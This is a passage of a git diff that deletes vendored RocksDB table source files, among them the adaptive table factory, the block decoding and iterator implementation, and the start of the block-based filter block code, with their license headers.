-    ret.append(buffer);
-  }
-  return ret;
-}
-
-extern TableFactory* NewAdaptiveTableFactory(
-    std::shared_ptr<TableFactory> table_factory_to_write,
-    std::shared_ptr<TableFactory> block_based_table_factory,
-    std::shared_ptr<TableFactory> plain_table_factory,
-    std::shared_ptr<TableFactory> cuckoo_table_factory) {
-  return new AdaptiveTableFactory(table_factory_to_write,
-      block_based_table_factory, plain_table_factory, cuckoo_table_factory);
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/adaptive_table_factory.h b/thirdparty/rocksdb/table/adaptive_table_factory.h
deleted file mode 100644
index b7b52ba..0000000
--- a/thirdparty/rocksdb/table/adaptive_table_factory.h
+++ /dev/null
@@ -1,62 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-
-namespace rocksdb {
-
-struct EnvOptions;
-
-using std::unique_ptr;
-class Status;
-class RandomAccessFile;
-class WritableFile;
-class Table;
-class TableBuilder;
-
-class AdaptiveTableFactory : public TableFactory {
- public:
-  ~AdaptiveTableFactory() {}
-
-  explicit AdaptiveTableFactory(
-      std::shared_ptr<TableFactory> table_factory_to_write,
-      std::shared_ptr<TableFactory> block_based_table_factory,
-      std::shared_ptr<TableFactory> plain_table_factory,
-      std::shared_ptr<TableFactory> cuckoo_table_factory);
-
-  const char* Name() const override { return "AdaptiveTableFactory"; }
-
-  Status NewTableReader(
-      const TableReaderOptions& table_reader_options,
-      unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-      unique_ptr<TableReader>* table,
-      bool prefetch_index_and_filter_in_cache = true) const override;
-
-  TableBuilder* NewTableBuilder(
-      const TableBuilderOptions& table_builder_options,
-      uint32_t column_family_id, WritableFileWriter* file) const override;
-
-  // Sanitizes the specified DB Options.
-  Status SanitizeOptions(const DBOptions& db_opts,
-                         const ColumnFamilyOptions& cf_opts) const override {
-    return Status::OK();
-  }
-
-  std::string GetPrintableTableOptions() const override;
-
- private:
-  std::shared_ptr<TableFactory> table_factory_to_write_;
-  std::shared_ptr<TableFactory> block_based_table_factory_;
-  std::shared_ptr<TableFactory> plain_table_factory_;
-  std::shared_ptr<TableFactory> cuckoo_table_factory_;
-};
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/block.cc b/thirdparty/rocksdb/table/block.cc
deleted file mode 100644
index 372bbd2..0000000
--- a/thirdparty/rocksdb/table/block.cc
+++ /dev/null
@@ -1,477 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// Decodes the blocks generated by block_builder.cc.
-
-#include "table/block.h"
-#include <algorithm>
-#include <string>
-#include <unordered_map>
-#include <vector>
-
-#include "monitoring/perf_context_imp.h"
-#include "port/port.h"
-#include "port/stack_trace.h"
-#include "rocksdb/comparator.h"
-#include "table/block_prefix_index.h"
-#include "table/format.h"
-#include "util/coding.h"
-#include "util/logging.h"
-
-namespace rocksdb {
-
-// Helper routine: decode the next block entry starting at "p",
-// storing the number of shared key bytes, non_shared key bytes,
-// and the length of the value in "*shared", "*non_shared", and
-// "*value_length", respectively.  Will not derefence past "limit".
-//
-// If any errors are detected, returns nullptr.  Otherwise, returns a
-// pointer to the key delta (just past the three decoded values).
-static inline const char* DecodeEntry(const char* p, const char* limit,
-                                      uint32_t* shared,
-                                      uint32_t* non_shared,
-                                      uint32_t* value_length) {
-  if (limit - p < 3) return nullptr;
-  *shared = reinterpret_cast<const unsigned char*>(p)[0];
-  *non_shared = reinterpret_cast<const unsigned char*>(p)[1];
-  *value_length = reinterpret_cast<const unsigned char*>(p)[2];
-  if ((*shared | *non_shared | *value_length) < 128) {
-    // Fast path: all three values are encoded in one byte each
-    p += 3;
-  } else {
-    if ((p = GetVarint32Ptr(p, limit, shared)) == nullptr) return nullptr;
-    if ((p = GetVarint32Ptr(p, limit, non_shared)) == nullptr) return nullptr;
-    if ((p = GetVarint32Ptr(p, limit, value_length)) == nullptr) return nullptr;
-  }
-
-  if (static_cast<uint32_t>(limit - p) < (*non_shared + *value_length)) {
-    return nullptr;
-  }
-  return p;
-}
-
-void BlockIter::Next() {
-  assert(Valid());
-  ParseNextKey();
-}
-
-void BlockIter::Prev() {
-  assert(Valid());
-
-  assert(prev_entries_idx_ == -1 ||
-         static_cast<size_t>(prev_entries_idx_) < prev_entries_.size());
-  // Check if we can use cached prev_entries_
-  if (prev_entries_idx_ > 0 &&
-      prev_entries_[prev_entries_idx_].offset == current_) {
-    // Read cached CachedPrevEntry
-    prev_entries_idx_--;
-    const CachedPrevEntry& current_prev_entry =
-        prev_entries_[prev_entries_idx_];
-
-    const char* key_ptr = nullptr;
-    if (current_prev_entry.key_ptr != nullptr) {
-      // The key is not delta encoded and stored in the data block
-      key_ptr = current_prev_entry.key_ptr;
-      key_pinned_ = true;
-    } else {
-      // The key is delta encoded and stored in prev_entries_keys_buff_
-      key_ptr = prev_entries_keys_buff_.data() + current_prev_entry.key_offset;
-      key_pinned_ = false;
-    }
-    const Slice current_key(key_ptr, current_prev_entry.key_size);
-
-    current_ = current_prev_entry.offset;
-    key_.SetInternalKey(current_key, false /* copy */);
-    value_ = current_prev_entry.value;
-
-    return;
-  }
-
-  // Clear prev entries cache
-  prev_entries_idx_ = -1;
-  prev_entries_.clear();
-  prev_entries_keys_buff_.clear();
-
-  // Scan backwards to a restart point before current_
-  const uint32_t original = current_;
-  while (GetRestartPoint(restart_index_) >= original) {
-    if (restart_index_ == 0) {
-      // No more entries
-      current_ = restarts_;
-      restart_index_ = num_restarts_;
-      return;
-    }
-    restart_index_--;
-  }
-
-  SeekToRestartPoint(restart_index_);
-
-  do {
-    if (!ParseNextKey()) {
-      break;
-    }
-    Slice current_key = key();
-
-    if (key_.IsKeyPinned()) {
-      // The key is not delta encoded
-      prev_entries_.emplace_back(current_, current_key.data(), 0,
-                                 current_key.size(), value());
-    } else {
-      // The key is delta encoded, cache decoded key in buffer
-      size_t new_key_offset = prev_entries_keys_buff_.size();
-      prev_entries_keys_buff_.append(current_key.data(), current_key.size());
-
-      prev_entries_.emplace_back(current_, nullptr, new_key_offset,
-                                 current_key.size(), value());
-    }
-    // Loop until end of current entry hits the start of original entry
-  } while (NextEntryOffset() < original);
-  prev_entries_idx_ = static_cast<int32_t>(prev_entries_.size()) - 1;
-}
-
-void BlockIter::Seek(const Slice& target) {
-  PERF_TIMER_GUARD(block_seek_nanos);
-  if (data_ == nullptr) {  // Not init yet
-    return;
-  }
-  uint32_t index = 0;
-  bool ok = false;
-  if (prefix_index_) {
-    ok = PrefixSeek(target, &index);
-  } else {
-    ok = BinarySeek(target, 0, num_restarts_ - 1, &index);
-  }
-
-  if (!ok) {
-    return;
-  }
-  SeekToRestartPoint(index);
-  // Linear search (within restart block) for first key >= target
-
-  while (true) {
-    if (!ParseNextKey() || Compare(key_.GetInternalKey(), target) >= 0) {
-      return;
-    }
-  }
-}
-
-void BlockIter::SeekForPrev(const Slice& target) {
-  PERF_TIMER_GUARD(block_seek_nanos);
-  if (data_ == nullptr) {  // Not init yet
-    return;
-  }
-  uint32_t index = 0;
-  bool ok = false;
-  ok = BinarySeek(target, 0, num_restarts_ - 1, &index);
-
-  if (!ok) {
-    return;
-  }
-  SeekToRestartPoint(index);
-  // Linear search (within restart block) for first key >= target
-
-  while (ParseNextKey() && Compare(key_.GetInternalKey(), target) < 0) {
-  }
-  if (!Valid()) {
-    SeekToLast();
-  } else {
-    while (Valid() && Compare(key_.GetInternalKey(), target) > 0) {
-      Prev();
-    }
-  }
-}
-
-void BlockIter::SeekToFirst() {
-  if (data_ == nullptr) {  // Not init yet
-    return;
-  }
-  SeekToRestartPoint(0);
-  ParseNextKey();
-}
-
-void BlockIter::SeekToLast() {
-  if (data_ == nullptr) {  // Not init yet
-    return;
-  }
-  SeekToRestartPoint(num_restarts_ - 1);
-  while (ParseNextKey() && NextEntryOffset() < restarts_) {
-    // Keep skipping
-  }
-}
-
-void BlockIter::CorruptionError() {
-  current_ = restarts_;
-  restart_index_ = num_restarts_;
-  status_ = Status::Corruption("bad entry in block");
-  key_.Clear();
-  value_.clear();
-}
-
-bool BlockIter::ParseNextKey() {
-  current_ = NextEntryOffset();
-  const char* p = data_ + current_;
-  const char* limit = data_ + restarts_;  // Restarts come right after data
-  if (p >= limit) {
-    // No more entries to return.  Mark as invalid.
-    current_ = restarts_;
-    restart_index_ = num_restarts_;
-    return false;
-  }
-
-  // Decode next entry
-  uint32_t shared, non_shared, value_length;
-  p = DecodeEntry(p, limit, &shared, &non_shared, &value_length);
-  if (p == nullptr || key_.Size() < shared) {
-    CorruptionError();
-    return false;
-  } else {
-    if (shared == 0) {
-      // If this key dont share any bytes with prev key then we dont need
-      // to decode it and can use it's address in the block directly.
-      key_.SetInternalKey(Slice(p, non_shared), false /* copy */);
-      key_pinned_ = true;
-    } else {
-      // This key share `shared` bytes with prev key, we need to decode it
-      key_.TrimAppend(shared, p, non_shared);
-      key_pinned_ = false;
-    }
-
-    if (global_seqno_ != kDisableGlobalSequenceNumber) {
-      // If we are reading a file with a global sequence number we should
-      // expect that all encoded sequence numbers are zeros and any value
-      // type is kTypeValue, kTypeMerge or kTypeDeletion
-      assert(GetInternalKeySeqno(key_.GetInternalKey()) == 0);
-
-      ValueType value_type = ExtractValueType(key_.GetInternalKey());
-      assert(value_type == ValueType::kTypeValue ||
-             value_type == ValueType::kTypeMerge ||
-             value_type == ValueType::kTypeDeletion);
-
-      if (key_pinned_) {
-        // TODO(tec): Investigate updating the seqno in the loaded block
-        // directly instead of doing a copy and update.
-
-        // We cannot use the key address in the block directly because
-        // we have a global_seqno_ that will overwrite the encoded one.
-        key_.OwnKey();
-        key_pinned_ = false;
-      }
-
-      key_.UpdateInternalKey(global_seqno_, value_type);
-    }
-
-    value_ = Slice(p + non_shared, value_length);
-    while (restart_index_ + 1 < num_restarts_ &&
-           GetRestartPoint(restart_index_ + 1) < current_) {
-      ++restart_index_;
-    }
-    return true;
-  }
-}
-
-// Binary search in restart array to find the first restart point that
-// is either the last restart point with a key less than target,
-// which means the key of next restart point is larger than target, or
-// the first restart point with a key = target
-bool BlockIter::BinarySeek(const Slice& target, uint32_t left, uint32_t right,
-                           uint32_t* index) {
-  assert(left <= right);
-
-  while (left < right) {
-    uint32_t mid = (left + right + 1) / 2;
-    uint32_t region_offset = GetRestartPoint(mid);
-    uint32_t shared, non_shared, value_length;
-    const char* key_ptr = DecodeEntry(data_ + region_offset, data_ + restarts_,
-                                      &shared, &non_shared, &value_length);
-    if (key_ptr == nullptr || (shared != 0)) {
-      CorruptionError();
-      return false;
-    }
-    Slice mid_key(key_ptr, non_shared);
-    int cmp = Compare(mid_key, target);
-    if (cmp < 0) {
-      // Key at "mid" is smaller than "target". Therefore all
-      // blocks before "mid" are uninteresting.
-      left = mid;
-    } else if (cmp > 0) {
-      // Key at "mid" is >= "target". Therefore all blocks at or
-      // after "mid" are uninteresting.
-      right = mid - 1;
-    } else {
-      left = right = mid;
-    }
-  }
-
-  *index = left;
-  return true;
-}
-
-// Compare target key and the block key of the block of `block_index`.
-// Return -1 if error.
-int BlockIter::CompareBlockKey(uint32_t block_index, const Slice& target) {
-  uint32_t region_offset = GetRestartPoint(block_index);
-  uint32_t shared, non_shared, value_length;
-  const char* key_ptr = DecodeEntry(data_ + region_offset, data_ + restarts_,
-                                    &shared, &non_shared, &value_length);
-  if (key_ptr == nullptr || (shared != 0)) {
-    CorruptionError();
-    return 1;  // Return target is smaller
-  }
-  Slice block_key(key_ptr, non_shared);
-  return Compare(block_key, target);
-}
-
-// Binary search in block_ids to find the first block
-// with a key >= target
-bool BlockIter::BinaryBlockIndexSeek(const Slice& target, uint32_t* block_ids,
-                                     uint32_t left, uint32_t right,
-                                     uint32_t* index) {
-  assert(left <= right);
-  uint32_t left_bound = left;
-
-  while (left <= right) {
-    uint32_t mid = (right + left) / 2;
-
-    int cmp = CompareBlockKey(block_ids[mid], target);
-    if (!status_.ok()) {
-      return false;
-    }
-    if (cmp < 0) {
-      // Key at "target" is larger than "mid". Therefore all
-      // blocks before or at "mid" are uninteresting.
-      left = mid + 1;
-    } else {
-      // Key at "target" is <= "mid". Therefore all blocks
-      // after "mid" are uninteresting.
-      // If there is only one block left, we found it.
-      if (left == right) break;
-      right = mid;
-    }
-  }
-
-  if (left == right) {
-    // In one of the two following cases:
-    // (1) left is the first one of block_ids
-    // (2) there is a gap of blocks between block of `left` and `left-1`.
-    // we can further distinguish the case of key in the block or key not
-    // existing, by comparing the target key and the key of the previous
-    // block to the left of the block found.
-    if (block_ids[left] > 0 &&
-        (left == left_bound || block_ids[left - 1] != block_ids[left] - 1) &&
-        CompareBlockKey(block_ids[left] - 1, target) > 0) {
-      current_ = restarts_;
-      return false;
-    }
-
-    *index = block_ids[left];
-    return true;
-  } else {
-    assert(left > right);
-    // Mark iterator invalid
-    current_ = restarts_;
-    return false;
-  }
-}
-
-bool BlockIter::PrefixSeek(const Slice& target, uint32_t* index) {
-  assert(prefix_index_);
-  uint32_t* block_ids = nullptr;
-  uint32_t num_blocks = prefix_index_->GetBlocks(target, &block_ids);
-
-  if (num_blocks == 0) {
-    current_ = restarts_;
-    return false;
-  } else  {
-    return BinaryBlockIndexSeek(target, block_ids, 0, num_blocks - 1, index);
-  }
-}
-
-uint32_t Block::NumRestarts() const {
-  assert(size_ >= 2*sizeof(uint32_t));
-  return DecodeFixed32(data_ + size_ - sizeof(uint32_t));
-}
-
-Block::Block(BlockContents&& contents, SequenceNumber _global_seqno,
-             size_t read_amp_bytes_per_bit, Statistics* statistics)
-    : contents_(std::move(contents)),
-      data_(contents_.data.data()),
-      size_(contents_.data.size()),
-      global_seqno_(_global_seqno) {
-  if (size_ < sizeof(uint32_t)) {
-    size_ = 0;  // Error marker
-  } else {
-    restart_offset_ =
-        static_cast<uint32_t>(size_) - (1 + NumRestarts()) * sizeof(uint32_t);
-    if (restart_offset_ > size_ - sizeof(uint32_t)) {
-      // The size is too small for NumRestarts() and therefore
-      // restart_offset_ wrapped around.
-      size_ = 0;
-    }
-  }
-  if (read_amp_bytes_per_bit != 0 && statistics && size_ != 0) {
-    read_amp_bitmap_.reset(new BlockReadAmpBitmap(
-        restart_offset_, read_amp_bytes_per_bit, statistics));
-  }
-}
-
-InternalIterator* Block::NewIterator(const Comparator* cmp, BlockIter* iter,
-                                     bool total_order_seek, Statistics* stats) {
-  if (size_ < 2*sizeof(uint32_t)) {
-    if (iter != nullptr) {
-      iter->SetStatus(Status::Corruption("bad block contents"));
-      return iter;
-    } else {
-      return NewErrorInternalIterator(Status::Corruption("bad block contents"));
-    }
-  }
-  const uint32_t num_restarts = NumRestarts();
-  if (num_restarts == 0) {
-    if (iter != nullptr) {
-      iter->SetStatus(Status::OK());
-      return iter;
-    } else {
-      return NewEmptyInternalIterator();
-    }
-  } else {
-    BlockPrefixIndex* prefix_index_ptr =
-        total_order_seek ? nullptr : prefix_index_.get();
-
-    if (iter != nullptr) {
-      iter->Initialize(cmp, data_, restart_offset_, num_restarts,
-                       prefix_index_ptr, global_seqno_, read_amp_bitmap_.get());
-    } else {
-      iter = new BlockIter(cmp, data_, restart_offset_, num_restarts,
-                           prefix_index_ptr, global_seqno_,
-                           read_amp_bitmap_.get());
-    }
-
-    if (read_amp_bitmap_) {
-      if (read_amp_bitmap_->GetStatistics() != stats) {
-        // DB changed the Statistics pointer, we need to notify read_amp_bitmap_
-        read_amp_bitmap_->SetStatistics(stats);
-      }
-    }
-  }
-
-  return iter;
-}
-
-void Block::SetBlockPrefixIndex(BlockPrefixIndex* prefix_index) {
-  prefix_index_.reset(prefix_index);
-}
-
-size_t Block::ApproximateMemoryUsage() const {
-  size_t usage = usable_size();
-  if (prefix_index_) {
-    usage += prefix_index_->ApproximateMemoryUsage();
-  }
-  return usage;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block.h b/thirdparty/rocksdb/table/block.h
deleted file mode 100644
index 59dc167..0000000
--- a/thirdparty/rocksdb/table/block.h
+++ /dev/null
@@ -1,384 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stddef.h>
-#include <stdint.h>
-#include <string>
-#include <vector>
-#ifdef ROCKSDB_MALLOC_USABLE_SIZE
-#ifdef OS_FREEBSD
-#include <malloc_np.h>
-#else
-#include <malloc.h>
-#endif
-#endif
-
-#include "db/dbformat.h"
-#include "db/pinned_iterators_manager.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-#include "table/block_prefix_index.h"
-#include "table/internal_iterator.h"
-#include "util/random.h"
-#include "util/sync_point.h"
-#include "format.h"
-
-namespace rocksdb {
-
-struct BlockContents;
-class Comparator;
-class BlockIter;
-class BlockPrefixIndex;
-
-// BlockReadAmpBitmap is a bitmap that map the rocksdb::Block data bytes to
-// a bitmap with ratio bytes_per_bit. Whenever we access a range of bytes in
-// the Block we update the bitmap and increment READ_AMP_ESTIMATE_USEFUL_BYTES.
-class BlockReadAmpBitmap {
- public:
-  explicit BlockReadAmpBitmap(size_t block_size, size_t bytes_per_bit,
-                              Statistics* statistics)
-      : bitmap_(nullptr),
-        bytes_per_bit_pow_(0),
-        statistics_(statistics),
-        rnd_(
-            Random::GetTLSInstance()->Uniform(static_cast<int>(bytes_per_bit))) {
-    TEST_SYNC_POINT_CALLBACK("BlockReadAmpBitmap:rnd", &rnd_);
-    assert(block_size > 0 && bytes_per_bit > 0);
-
-    // convert bytes_per_bit to be a power of 2
-    while (bytes_per_bit >>= 1) {
-      bytes_per_bit_pow_++;
-    }
-
-    // num_bits_needed = ceil(block_size / bytes_per_bit)
-    size_t num_bits_needed =
-      ((block_size - 1) >> bytes_per_bit_pow_) + 1;
-    assert(num_bits_needed > 0);
-
-    // bitmap_size = ceil(num_bits_needed / kBitsPerEntry)
-    size_t bitmap_size = (num_bits_needed - 1) / kBitsPerEntry + 1;
-
-    // Create bitmap and set all the bits to 0
-    bitmap_ = new std::atomic<uint32_t>[bitmap_size]();
-
-    RecordTick(GetStatistics(), READ_AMP_TOTAL_READ_BYTES, block_size);
-  }
-
-  ~BlockReadAmpBitmap() { delete[] bitmap_; }
-
-  void Mark(uint32_t start_offset, uint32_t end_offset) {
-    assert(end_offset >= start_offset);
-    // Index of first bit in mask
-    uint32_t start_bit =
-        (start_offset + (1 << bytes_per_bit_pow_) - rnd_ - 1) >>
-        bytes_per_bit_pow_;
-    // Index of last bit in mask + 1
-    uint32_t exclusive_end_bit =
-        (end_offset + (1 << bytes_per_bit_pow_) - rnd_) >> bytes_per_bit_pow_;
-    if (start_bit >= exclusive_end_bit) {
-      return;
-    }
-    assert(exclusive_end_bit > 0);
-
-    if (GetAndSet(start_bit) == 0) {
-      uint32_t new_useful_bytes = (exclusive_end_bit - start_bit)
-                                  << bytes_per_bit_pow_;
-      RecordTick(GetStatistics(), READ_AMP_ESTIMATE_USEFUL_BYTES,
-                 new_useful_bytes);
-    }
-  }
-
-  Statistics* GetStatistics() {
-    return statistics_.load(std::memory_order_relaxed);
-  }
-
-  void SetStatistics(Statistics* stats) { statistics_.store(stats); }
-
-  uint32_t GetBytesPerBit() { return 1 << bytes_per_bit_pow_; }
-
- private:
-  // Get the current value of bit at `bit_idx` and set it to 1
-  inline bool GetAndSet(uint32_t bit_idx) {
-    const uint32_t byte_idx = bit_idx / kBitsPerEntry;
-    const uint32_t bit_mask = 1 << (bit_idx % kBitsPerEntry);
-
-    return bitmap_[byte_idx].fetch_or(bit_mask, std::memory_order_relaxed) &
-           bit_mask;
-  }
-
-  const uint32_t kBytesPersEntry = sizeof(uint32_t);   // 4 bytes
-  const uint32_t kBitsPerEntry = kBytesPersEntry * 8;  // 32 bits
-
-  // Bitmap used to record the bytes that we read, use atomic to protect
-  // against multiple threads updating the same bit
-  std::atomic<uint32_t>* bitmap_;
-  // (1 << bytes_per_bit_pow_) is bytes_per_bit. Use power of 2 to optimize
-  // muliplication and division
-  uint8_t bytes_per_bit_pow_;
-  // Pointer to DB Statistics object, Since this bitmap may outlive the DB
-  // this pointer maybe invalid, but the DB will update it to a valid pointer
-  // by using SetStatistics() before calling Mark()
-  std::atomic<Statistics*> statistics_;
-  uint32_t rnd_;
-};
-
-class Block {
- public:
-  // Initialize the block with the specified contents.
-  explicit Block(BlockContents&& contents, SequenceNumber _global_seqno,
-                 size_t read_amp_bytes_per_bit = 0,
-                 Statistics* statistics = nullptr);
-
-  ~Block() = default;
-
-  size_t size() const { return size_; }
-  const char* data() const { return data_; }
-  bool cachable() const { return contents_.cachable; }
-  size_t usable_size() const {
-#ifdef ROCKSDB_MALLOC_USABLE_SIZE
-    if (contents_.allocation.get() != nullptr) {
-      return malloc_usable_size(contents_.allocation.get());
-    }
-#endif  // ROCKSDB_MALLOC_USABLE_SIZE
-    return size_;
-  }
-  uint32_t NumRestarts() const;
-  CompressionType compression_type() const {
-    return contents_.compression_type;
-  }
-
-  // If hash index lookup is enabled and `use_hash_index` is true. This block
-  // will do hash lookup for the key prefix.
-  //
-  // NOTE: for the hash based lookup, if a key prefix doesn't match any key,
-  // the iterator will simply be set as "invalid", rather than returning
-  // the key that is just pass the target key.
-  //
-  // If iter is null, return new Iterator
-  // If iter is not null, update this one and return it as Iterator*
-  //
-  // If total_order_seek is true, hash_index_ and prefix_index_ are ignored.
-  // This option only applies for index block. For data block, hash_index_
-  // and prefix_index_ are null, so this option does not matter.
-  InternalIterator* NewIterator(const Comparator* comparator,
-                                BlockIter* iter = nullptr,
-                                bool total_order_seek = true,
-                                Statistics* stats = nullptr);
-  void SetBlockPrefixIndex(BlockPrefixIndex* prefix_index);
-
-  // Report an approximation of how much memory has been used.
-  size_t ApproximateMemoryUsage() const;
-
-  SequenceNumber global_seqno() const { return global_seqno_; }
-
- private:
-  BlockContents contents_;
-  const char* data_;            // contents_.data.data()
-  size_t size_;                 // contents_.data.size()
-  uint32_t restart_offset_;     // Offset in data_ of restart array
-  std::unique_ptr<BlockPrefixIndex> prefix_index_;
-  std::unique_ptr<BlockReadAmpBitmap> read_amp_bitmap_;
-  // All keys in the block will have seqno = global_seqno_, regardless of
-  // the encoded value (kDisableGlobalSequenceNumber means disabled)
-  const SequenceNumber global_seqno_;
-
-  // No copying allowed
-  Block(const Block&);
-  void operator=(const Block&);
-};
-
-class BlockIter : public InternalIterator {
- public:
-  BlockIter()
-      : comparator_(nullptr),
-        data_(nullptr),
-        restarts_(0),
-        num_restarts_(0),
-        current_(0),
-        restart_index_(0),
-        status_(Status::OK()),
-        prefix_index_(nullptr),
-        key_pinned_(false),
-        global_seqno_(kDisableGlobalSequenceNumber),
-        read_amp_bitmap_(nullptr),
-        last_bitmap_offset_(0) {}
-
-  BlockIter(const Comparator* comparator, const char* data, uint32_t restarts,
-            uint32_t num_restarts, BlockPrefixIndex* prefix_index,
-            SequenceNumber global_seqno, BlockReadAmpBitmap* read_amp_bitmap)
-      : BlockIter() {
-    Initialize(comparator, data, restarts, num_restarts, prefix_index,
-               global_seqno, read_amp_bitmap);
-  }
-
-  void Initialize(const Comparator* comparator, const char* data,
-                  uint32_t restarts, uint32_t num_restarts,
-                  BlockPrefixIndex* prefix_index, SequenceNumber global_seqno,
-                  BlockReadAmpBitmap* read_amp_bitmap) {
-    assert(data_ == nullptr);           // Ensure it is called only once
-    assert(num_restarts > 0);           // Ensure the param is valid
-
-    comparator_ = comparator;
-    data_ = data;
-    restarts_ = restarts;
-    num_restarts_ = num_restarts;
-    current_ = restarts_;
-    restart_index_ = num_restarts_;
-    prefix_index_ = prefix_index;
-    global_seqno_ = global_seqno;
-    read_amp_bitmap_ = read_amp_bitmap;
-    last_bitmap_offset_ = current_ + 1;
-  }
-
-  void SetStatus(Status s) {
-    status_ = s;
-  }
-
-  virtual bool Valid() const override { return current_ < restarts_; }
-  virtual Status status() const override { return status_; }
-  virtual Slice key() const override {
-    assert(Valid());
-    return key_.GetInternalKey();
-  }
-  virtual Slice value() const override {
-    assert(Valid());
-    if (read_amp_bitmap_ && current_ < restarts_ &&
-        current_ != last_bitmap_offset_) {
-      read_amp_bitmap_->Mark(current_ /* current entry offset */,
-                             NextEntryOffset() - 1);
-      last_bitmap_offset_ = current_;
-    }
-    return value_;
-  }
-
-  virtual void Next() override;
-
-  virtual void Prev() override;
-
-  virtual void Seek(const Slice& target) override;
-
-  virtual void SeekForPrev(const Slice& target) override;
-
-  virtual void SeekToFirst() override;
-
-  virtual void SeekToLast() override;
-
-#ifndef NDEBUG
-  ~BlockIter() {
-    // Assert that the BlockIter is never deleted while Pinning is Enabled.
-    assert(!pinned_iters_mgr_ ||
-           (pinned_iters_mgr_ && !pinned_iters_mgr_->PinningEnabled()));
-  }
-  virtual void SetPinnedItersMgr(
-      PinnedIteratorsManager* pinned_iters_mgr) override {
-    pinned_iters_mgr_ = pinned_iters_mgr;
-  }
-  PinnedIteratorsManager* pinned_iters_mgr_ = nullptr;
-#endif
-
-  virtual bool IsKeyPinned() const override { return key_pinned_; }
-
-  virtual bool IsValuePinned() const override { return true; }
-
-  size_t TEST_CurrentEntrySize() { return NextEntryOffset() - current_; }
-
-  uint32_t ValueOffset() const {
-    return static_cast<uint32_t>(value_.data() - data_);
-  }
-
- private:
-  const Comparator* comparator_;
-  const char* data_;       // underlying block contents
-  uint32_t restarts_;      // Offset of restart array (list of fixed32)
-  uint32_t num_restarts_;  // Number of uint32_t entries in restart array
-
-  // current_ is offset in data_ of current entry.  >= restarts_ if !Valid
-  uint32_t current_;
-  uint32_t restart_index_;  // Index of restart block in which current_ falls
-  IterKey key_;
-  Slice value_;
-  Status status_;
-  BlockPrefixIndex* prefix_index_;
-  bool key_pinned_;
-  SequenceNumber global_seqno_;
-
-  // read-amp bitmap
-  BlockReadAmpBitmap* read_amp_bitmap_;
-  // last `current_` value we report to read-amp bitmp
-  mutable uint32_t last_bitmap_offset_;
-
-  struct CachedPrevEntry {
-    explicit CachedPrevEntry(uint32_t _offset, const char* _key_ptr,
-                             size_t _key_offset, size_t _key_size, Slice _value)
-        : offset(_offset),
-          key_ptr(_key_ptr),
-          key_offset(_key_offset),
-          key_size(_key_size),
-          value(_value) {}
-
-    // offset of entry in block
-    uint32_t offset;
-    // Pointer to key data in block (nullptr if key is delta-encoded)
-    const char* key_ptr;
-    // offset of key in prev_entries_keys_buff_ (0 if key_ptr is not nullptr)
-    size_t key_offset;
-    // size of key
-    size_t key_size;
-    // value slice pointing to data in block
-    Slice value;
-  };
-  std::string prev_entries_keys_buff_;
-  std::vector<CachedPrevEntry> prev_entries_;
-  int32_t prev_entries_idx_ = -1;
-
-  inline int Compare(const Slice& a, const Slice& b) const {
-    return comparator_->Compare(a, b);
-  }
-
-  // Return the offset in data_ just past the end of the current entry.
-  inline uint32_t NextEntryOffset() const {
-    // NOTE: We don't support blocks bigger than 2GB
-    return static_cast<uint32_t>((value_.data() + value_.size()) - data_);
-  }
-
-  uint32_t GetRestartPoint(uint32_t index) {
-    assert(index < num_restarts_);
-    return DecodeFixed32(data_ + restarts_ + index * sizeof(uint32_t));
-  }
-
-  void SeekToRestartPoint(uint32_t index) {
-    key_.Clear();
-    restart_index_ = index;
-    // current_ will be fixed by ParseNextKey();
-
-    // ParseNextKey() starts at the end of value_, so set value_ accordingly
-    uint32_t offset = GetRestartPoint(index);
-    value_ = Slice(data_ + offset, 0);
-  }
-
-  void CorruptionError();
-
-  bool ParseNextKey();
-
-  bool BinarySeek(const Slice& target, uint32_t left, uint32_t right,
-                  uint32_t* index);
-
-  int CompareBlockKey(uint32_t block_index, const Slice& target);
-
-  bool BinaryBlockIndexSeek(const Slice& target, uint32_t* block_ids,
-                            uint32_t left, uint32_t right,
-                            uint32_t* index);
-
-  bool PrefixSeek(const Slice& target, uint32_t* index);
-
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_filter_block.cc b/thirdparty/rocksdb/table/block_based_filter_block.cc
deleted file mode 100644
index 697c11a..0000000
--- a/thirdparty/rocksdb/table/block_based_filter_block.cc
+++ /dev/null
@@ -1,255 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/block_based_filter_block.h"
-#include <algorithm>
-
-#include "db/dbformat.h"
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/filter_policy.h"
-#include "util/coding.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-namespace {
-
-void AppendItem(std::string* props, const std::string& key,
-                const std::string& value) {
